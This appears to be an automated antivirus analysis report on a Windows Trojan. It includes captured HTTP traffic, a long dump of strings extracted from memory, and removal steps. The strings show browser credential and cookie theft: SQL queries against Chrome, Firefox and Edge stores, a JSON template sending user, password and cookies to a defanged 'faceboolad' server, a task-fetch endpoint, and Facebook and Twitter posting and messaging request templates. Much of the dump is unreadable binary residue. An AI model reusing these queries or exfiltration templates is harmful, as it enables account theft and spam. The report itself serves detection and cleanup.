Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701872936&nv=3&t=-&v=-&p=-&si=-&s
HTTP/1.1 204 No Content
Date: Fri, 02 Dec 2016 18:04:34 GMT
Server: Apache-Coyote/1.1
Via: 1.1 VVV.mapsgalaxy.com
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive



GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/installError.jhtml&anxl=en-US&anxlv=1480701874788&anxrd=free.mytransitguide.com&anxrp=index.jhtml&anxrk=-&anxrm=-&anxrb=-&anxrc=-&anxrs=-&anxsq=2&errorCode=blockedCountry&errorType=browser&anxe=installErrorLanding&anxr=152677283 HTTP/1.1

Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://free.mytransitguide.com/installError.jhtml?errorType=browser&errorCode=blockedCountry
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: free.mytransitguide.com
Connection: Keep-Alive
Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3lt
HTTP/1.1 204 No Content
Date: Fri, 02 Dec 2016 18:04:34 GMT
Server: Apache-Coyote/1.1
Via: 1.1 VVV.mapsgalaxy.com
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


The Trojan connects to the servers at the following location(s):

%original file name%.exe_2948:


dllhost.exe_2044:

sqlite3_column_double
sqlite3_column_int
sqlite3_column_int64
sqlite3_column_name
sqlite3_column_name16
sqlite3_column_origin_name
sqlite3_column_origin_name16
sqlite3_column_table_name
sqlite3_column_table_name16
sqlite3_column_text
sqlite3_column_text16
sqlite3_column_type
sqlite3_column_value
sqlite3_commit_hook
sqlite3_compileoption_get
sqlite3_compileoption_used
sqlite3_complete
sqlite3_complete16
sqlite3_config
sqlite3_context_db_handle
sqlite3_create_collation
sqlite3_create_collation16
sqlite3_create_collation_v2
sqlite3_create_function
sqlite3_create_function16
sqlite3_create_function_v2
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_data_count
sqlite3_db_config
sqlite3_db_filename
sqlite3_db_handle
sqlite3_db_mutex
sqlite3_db_readonly
sqlite3_db_release_memory
sqlite3_db_status
sqlite3_declare_vtab
sqlite3_enable_load_extension
sqlite3_enable_shared_cache
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg16
sqlite3_errstr
sqlite3_exec
sqlite3_expired
sqlite3_extended_errcode
sqlite3_extended_result_codes
sqlite3_file_control
sqlite3_finalize
sqlite3_free
sqlite3_free_table
sqlite3_get_autocommit
sqlite3_get_auxdata
sqlite3_get_table
sqlite3_global_recover
sqlite3_initialize
sqlite3_interrupt
sqlite3_key
sqlite3_key_v2
sqlite3_last_insert_rowid
sqlite3_libversion
sqlite3_libversion_number
sqlite3_limit
sqlite3_load_extension
sqlite3_log
sqlite3_malloc
sqlite3_malloc64
sqlite3_memory_alarm
sqlite3_memory_highwater
sqlite3_memory_used
sqlite3_mprintf
sqlite3_msize
sqlite3_mutex_alloc
sqlite3_mutex_enter
sqlite3_mutex_free
sqlite3_mutex_leave
sqlite3_mutex_try
sqlite3_next_stmt
sqlite3_open
sqlite3_open16
sqlite3_open_v2
sqlite3_os_end
sqlite3_os_init
sqlite3_overload_function
sqlite3_prepare
sqlite3_prepare16
sqlite3_prepare16_v2
sqlite3_prepare_v2
sqlite3_profile
sqlite3_progress_handler
sqlite3_randomness
sqlite3_realloc
sqlite3_realloc64
sqlite3_rekey
sqlite3_rekey_v2
sqlite3_release_memory
sqlite3_reset
sqlite3_reset_auto_extension
sqlite3_result_blob
sqlite3_result_blob64
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error16
sqlite3_result_error_code
sqlite3_result_error_nomem
sqlite3_result_error_toobig
sqlite3_result_int
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_subtype
sqlite3_result_text
sqlite3_result_text16
sqlite3_result_text16be
sqlite3_result_text16le
sqlite3_result_text64
sqlite3_result_value
sqlite3_result_zeroblob
sqlite3_result_zeroblob64
sqlite3_rollback_hook
sqlite3_rtree_geometry_callback
sqlite3_rtree_query_callback
sqlite3_set_authorizer
sqlite3_set_auxdata
sqlite3_shutdown
sqlite3_sleep
sqlite3_snprintf
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit64
sqlite3_sourceid
sqlite3_sql
sqlite3_status
sqlite3_status64
sqlite3_step
sqlite3_stmt_busy
sqlite3_stmt_readonly
sqlite3_stmt_status
sqlite3_strglob
sqlite3_stricmp
sqlite3_strnicmp
sqlite3_table_column_metadata
sqlite3_test_control
sqlite3_thread_cleanup
sqlite3_threadsafe
sqlite3_total_changes
sqlite3_trace
sqlite3_transfer_bindings
sqlite3_update_hook
sqlite3_uri_boolean
sqlite3_uri_int64
sqlite3_uri_parameter
sqlite3_user_add
sqlite3_user_authenticate
sqlite3_user_change
sqlite3_user_data
sqlite3_user_delete
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes16
sqlite3_value_double
sqlite3_value_dup
sqlite3_value_free
sqlite3_value_int
sqlite3_value_int64
sqlite3_value_numeric_type
sqlite3_value_subtype
sqlite3_value_text
sqlite3_value_text16
sqlite3_value_text16be
sqlite3_value_text16le
sqlite3_value_type
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vmprintf
sqlite3_vsnprintf
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint_v2
sqlite3_wal_hook
sqlite3_win32_is_nt
sqlite3_win32_mbcs_to_utf8
sqlite3_win32_set_directory
sqlite3_win32_sleep
sqlite3_win32_utf8_to_mbcs
sqlite3_win32_write_debug
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2,292}: ;
7074787<7
)0:0&171
? ?$?(?,?
2 2.272^2
6(7,7074709
< <$<(<,<0<4<8<
8Œ8-:2:o:t:
6(7,70747|7
0 0$0(0,0004080
\\.\PhysicalDrive0000000-000000-000000-000000-000000
@Windows 10
Windows Server Technical Preview
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 2000
Windows XP
Windows Server 2003 R2
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003
Windows 98
Web Server Edition
{"code":"{Code}","type":{type},"ver":"{Ver}","browser":"{Browser}","user":"{User}","pass":"{Pass}","cookies":"{Cookies}","aid":{Aid},"utype":{uType}}
{Pass}
hXXp://api.faceboolad.com/api//send
WinHttp.WinHttpRequest.5.1
hXXp://VVV.facebook.com
Server-Key
Chrome
Firefox
facebook.com
select name,encrypted_value from cookies where host_key = '.facebook.com'
\Local\Google\Chrome\User Data
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies
hXXps://VVV.facebook.com/
select name,value from moz_cookies where host = '.facebook.com'
\Roaming\Mozilla\Firefox\Profiles
\cookies.sqlite
Login Data
select username_value, password_value, signon_realm from logins
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
hXXp://api.faceboolad.com/api//GetTask?code=
[ImageUrl]
Dalvik/2.1.0 (Linux; U; Android 6.0.1; MI NOTE LTE MIUI/6.8.11)
twitter.com
772630264522559488
select name,encrypted_value from cookies where host_key = '.twitter.com'
hXXps://VVV.twitter.com/
select name,value from moz_cookies where host = '.twitter.com'
Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs=1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA
hXXps://m.facebook.com/
hXXps://VVV.facebook.com/settings
VBScript.RegExp
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=8
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message=&view_privacy=
hXXps://m.facebook.com/home.php
hXXps://m.facebook.com
hXXps://VVV.facebook.com/notes/composer/photos/?thumb_height=116&thumb_width=149&av={c_user}&dpr=1
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=7&ref=wizard
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message={text}&view_post=发布
hXXps://m.facebook.com/home.php?ref=wizard&_rdr
hXXps://m.facebook.com/composer/mbasic/?csid=94c178a8-8774-424a-8c53-9994984e3fba&incparms[0]=xc_message&av={c_user}
------WebKitFormBoundarydDyitWHTKuC21cBZ
€,´,€,´,水,Д,Є
94c178a8-8774-424a-8c53-9994984e3fba
web_m_touch
发布
Content-Disposition: form-data; name="file0"; filename="test.jpg"
------WebKitFormBoundarydDyitWHTKuC21cBZ--
hXXps://m.facebook.com/composer/mbasic/?mnt_query&csid=94c178a8-8774-424a-8c53-9994984e3fba
multipart/form-data; boundary=----WebKitFormBoundarydDyitWHTKuC21cBZ
hXXps://m.facebook.com/home.php?stype=phs&sk=live&gfid=
hXXps://VVV.facebook.com/notes/composer/?dpr=1
hXXps://VVV.facebook.com
hXXps://VVV.facebook.com/notes
hXXps://VVV.facebook.com/notes/composer/upload/coverphoto/?media_type=photo¬e_id={NoteId}&__a=1&fb_dtsg={fb_dtsg}
------WebKitFormBoundaryy1orVA8O3OLUfzBE
Content-Disposition: form-data; name="file"; filename="test.jpg"
------WebKitFormBoundaryy1orVA8O3OLUfzBE--
multipart/form-data; boundary=----WebKitFormBoundaryy1orVA8O3OLUfzBE
hXXps://VVV.facebook.com/notes/composer/publish/?av={c_user}&dpr=1
{"offset":{offset},"length":{length},"key":{Index}}
{URL}
"{Index}":{"id":null,"type":7,"data":{"url":"{URL}"}}
hXXps://m.facebook.com/friends/center/friends/?ppk={page}
hXXps://m.facebook.com/friends/center/friends/?mff_nav=1&fb_ref=fbm&ref=bookmarks
XMLHttpRequest
hXXps://VVV.facebook.com/messaging/send/?dpr=1
client=mercury&action_type=ma-type:user-generated-message&body={text}&has_attachment=false&message_id={messageId}&offline_threading_id={messageId}&other_user_fbid={fbid}&source=source:chat:web&specific_to_list[0]=fbid:{fbid}&specific_to_list[1]=fbid:{c_user}×tamp={time}&ui_push_phase=V3&__a=1&fb_dtsg={fb_dtsg}
Math.round(new Date().getTime()/1000)
Math.round(new Date().getTime())
Math.round(new Date().getTime() * 100)
function genOfflineThreadingID(){return new Date().getTime()   Math.random().toString().slice(2,8);}
select count(*) from sqlite_master where type='table' and tbl_name='
select tbl_name from sqlite_master where type='table' and tbl_name<>'sqlite_sequence'
hXXps://mobile.twitter.com/account
hXXps://mobile.twitter.com/settings
hXXps://api.twitter.com/1.1/users/lookup.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&screen_name=
hXXps://api.twitter.com/1.1/friendships/create.json
hXXps://api.twitter.com/1.1/statuses/update.json
&media_type=image/jpeg
hXXps://upload.twitter.com/i/media/upload.json?command=INIT&total_bytes=
hXXps://mobile.twitter.com/compose/tweet
hXXps://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=
------WebKitFormBoundaryUbnK77J90KHiGB65
------WebKitFormBoundaryUbnK77J90KHiGB65--
hXXps://mobile.twitter.com
multipart/form-data; boundary=----WebKitFormBoundaryUbnK77J90KHiGB65
hXXps://upload.twitter.com/i/media/upload.json?command=FINALIZE&media_id=
hXXps://api.twitter.com/1.1/followers/list.json?cursor=
hXXps://api.twitter.com/1.1/friends/list.json?cursor=
hXXps://api.twitter.com/1.1/users/recommendations.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&skip_status=true&limit=300&pc=true&display_location=WTF_viewall&user_id=
hXXps://twitter.com/trends/location_dialog
hXXps://twitter.com/
trends_cache_key
hXXps://twitter.com/i/trends?k={key}&pc=true&personalized=false&show_context=true&src=module&woeid={woeid}
{key}
hXXps://twitter.com/i/search/timeline?vertical=default&q=#{key}&src=tren&composed_count=0&include_available_features=1&include_entities=1&include_new_items_bar=true&interval={interval}&latent_count=0&min_position={min_position}
application/x-www-form-urlencoded
SetClientCertificate
TempObj=JSON.parse(str);
var obj=JSON.parse(str);
Lobj.push(obj);
return Lobj.length;
function GetAllKey(){
Lobj = JSON.parse(str);
var str=JSON.stringify(Lobj);
return Lobj.str;
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf())
? this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z'
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
: '\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
v = partial.length === 0
? '[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']'
: '['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
if (Object.prototype.hasOwnProperty.call(value, k)) {
v = partial.length === 0
? '{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}'
: '{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
throw new SyntaxError('JSON.parse');
JSON.stringify(Lobj['
Lobj.push("
Lobj.push(
Lobj.push('
Lobj.length
JSON.stringify(Lobj[
Lobj.splice(
JSON.stringify(Lobj
GetAllKey
var keyStr = "ABCDEFGHIJKLMNOP"  
for (var i=0; i<strNative.length; i  ) {
var c = strNative.charAt(i);
var cc = strNative.charCodeAt(i);
return hexChars.charAt(nH)   hexChars.charAt(nL);
var posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substring(posFrom, posTo);
output  = toChar(strAscii.substr(posTo, 6));
posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substr(posFrom);
if (str.substr(0, 2) != "\\u") return str;
for (var i=2; i<str.length; i  ) {
var cc = str.charCodeAt(i);
return String.fromCharCode(code);
function URlEncode(temp){return(encodeURIComponent(temp));}
function URlDecode(temp){return(decodeURIComponent(temp));}
function Utf8Decode(temp){return(URlDecode(decodeURI(temp)));}
URlDecode
URlEncode
Adodb.Stream
kernel32.dll
advapi32.dll
ntdll.dll
Kernel32.dll
ole32.dll
shlwapi.dll
shell32.dll
crypt32.dll
wininet.dll
psapi.dll
MsgWaitForMultipleObjects
program internal error number is %d.
:"%s"
:"%s".
C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
operator
TcPX
G%FuSVb
l".mN{
.as2h
.HptE
&.JVlh
w.UqB$p
%cW4I
).BF`
@~x.iu
5Q5%f
#üs#
]7.rg
mpr
"4St%c
B%XP_C(
.rWV/b~
^%UY/
?%F.{<
#m|%dMI3
.iF(`uO2
c.SFk&[
.hC(apO3
u.OVk:K
u.HVk:K
/%xVt
)fW.mdG
%fQ#obD?
.bNL"
.bML"
X.kzf5i
Tm.nK
%XPVS
}^,%d
#@1.EY
.WD:T
mn%XT
_(Web
f.zB"
.cRJ2b
PD.eX
|)xAh.YwL67j
%SoHC
-X}*j;5j
%SPzK$$
sC.Cq)
(.JY_}
R%XN9
!%CYT
h0%x~_
(.Us#
P'-4u}
Nk.MV
%CwB5ZU
hN.bT{
D$,2%f
.EDRk(
0 0<0@0`0
USER32.dll
.pq!q[
n.HoN
c!%Cs
Dg4x'A%C
.Ye&`
XcRT@
~*=]^.Zn
.njDC
v.Wof
.vx?ryV
'].PoC
Crtm
i;O}t%U
1y.cvr
.Zq/A
%SqtY
)]%s,#
%x9?l
.XubOk
'(.XD
.gavy
vf[%FT
%SyI]
9.lY&
6nl*%u
nKt.Sm
q%FOu
.jn^'@4<
ly}@
/OgX%d~
%U7B&R
\%X?Y
h`'.qih
m}o%D
*.pB? 
.meD'1
mLu h%C
!O&A%C
q1%su
({.kc
95;*?=?1
y.yaa
.jtE".
/msG<
%F.rH
.bfY7m
.wBfi
112 34"7?
B.Jex
Ye.FU
)K%X:^
!OPsWININET.dll
{sole32.dll
CRYPT32.dll
OLEAUT32.dll
=#TCT?
^d.JL[
W.cFZ?
<vSHELL32.dll
PSAPI.DLL
;=: ;"${/
PKERNEL32.dll
SHLWAPI.dll
*.WN6T
-@ .wj
.ZWOI
%f[o4
þiq
.cg6Y
Co.vT
?wn.vh
?m.re
nG5%S
Z2.ywq
a:-}%X
.Rwuf
.wX(%
.nWUFwNOI
.vXFD
*&.tT
%xHiG
A m*%c
.vwfb
w.QOt
%X$4m
h.QYV
eudPk
%1sG7
o8&`.wF
%XQMw
H.wFu
.tx#-
d.cEw
T.hjw
.vbYq_\t}@ym:
s.cGm
.kh;w
Cgw`8%f
*.Vr;
'm%6s6
4?v.Kv
w%d(*f
.Ri0;w`
m.LwO:
.aDWC
w\Hwu%UwN
!.yww4
.Jw<S
%smGwe'@
e!hfJ-D}
0avÜ
.sw#I
-b}(%
|w.Ec
x.LA,wz9n&|
?zw.Cc
weBg
w#.rS
.ws|v
5wþ
.wHwn2
~Bj.WI
_x@.ep
%D{w@X
",w.Vx
%Dw7W
B(.VO
.BsRk
m!S
FLu%5xNM
@.EVQ(j
?ji%D
.wgh< !
#Ow%c!v
B.wR2S
e_)%D#Gmw
m[.OC
zg%XSi
(.Ev}
i.ZDL
v1hB.KAW}
a.TfZ!
O.Hw?
,.YwM
t7.hJ
wDpZ%x
.kiH"
?$.Bwp(
.dmvE
B.QJR
0<{:.wDN
t.HCm
B.xmw
oWEB^w\
.Sw6G
$s%Fj
4F,%f~
.rDF_
%DX"w
.wI(O
w.wV'
.mwa!x
G(%d{
xv.%do
^fË2U
%D{@X
F.ju-as
-.Tg?
cf.wd
%c^RX
L.jq1t
.Kw]D
%FhtQ
YZ.sW
F^.tlr
p\F%c
B7Y.ev
bIw.ga=<
5?474/4'
-/_"]/_-
.tInC
G%Cgs)
I.nt[
57.lC)
].BY k
-.Hx:
%s*':
FF^%uB
4.If`
nû.a
OFADVAPI32.dll
*6Âk
81Þ
nEb.cRw&Dz
$Ï'
:.MjQ
B:Í
.Mx&[
`]T-O}S{E
1%XJVt
@.euee
0%c<pf?
.ZHh^
.Pq k
m.pz_
V5.rN
92>>4:::444
4$1$%dh`Vp/8
%D_RE
]].eX6t0
co.KKV-C^
.cEvO:8
^D.DA}
&.bEy"
zU.CC
 k5%D
-'''%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'',
^^`^`^`^
^`^`^```
&##&&&&###(&@
8888883
88878878878878'
5536560
36333-
553533533'
%'**  -'
'00  ***'%
%'** -0'
33000  ***%
%'   -0 
-363300   *'%
%' --00'
35336363300--  %
0' 0333033030330330 '0
 *'' ''*'*'*'*'-
%#(**-...--/-/-0---/--***''
"**---..././-0-0-0----***"
''**-*--**-*--*-*%"*
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
//szVersion = window.external.GetRealVersion();
alert(window.external.GetPingbackBasicString());
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
SQLite
SQLite3 Database Library
3.9.2.1
SQLite3
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
10.0.1 build-1379776
vmware.exe
2.2.1.7
QiyiClient.exe

dllhost.exe_2044_rwx_00548000_00108000:


dllhost.exe_2044_rwx_006E1000_00001000:

^d.JL[

svchost.exe_2944:


svchost.exe_2944_rwx_00421000_000F7000:


iexplore.exe_3712:


iexplore.exe_3220:


SearchProtocolHost.exe_2872:


SearchFilterHost.exe_2800:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2948

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe (6076 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe (9645 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
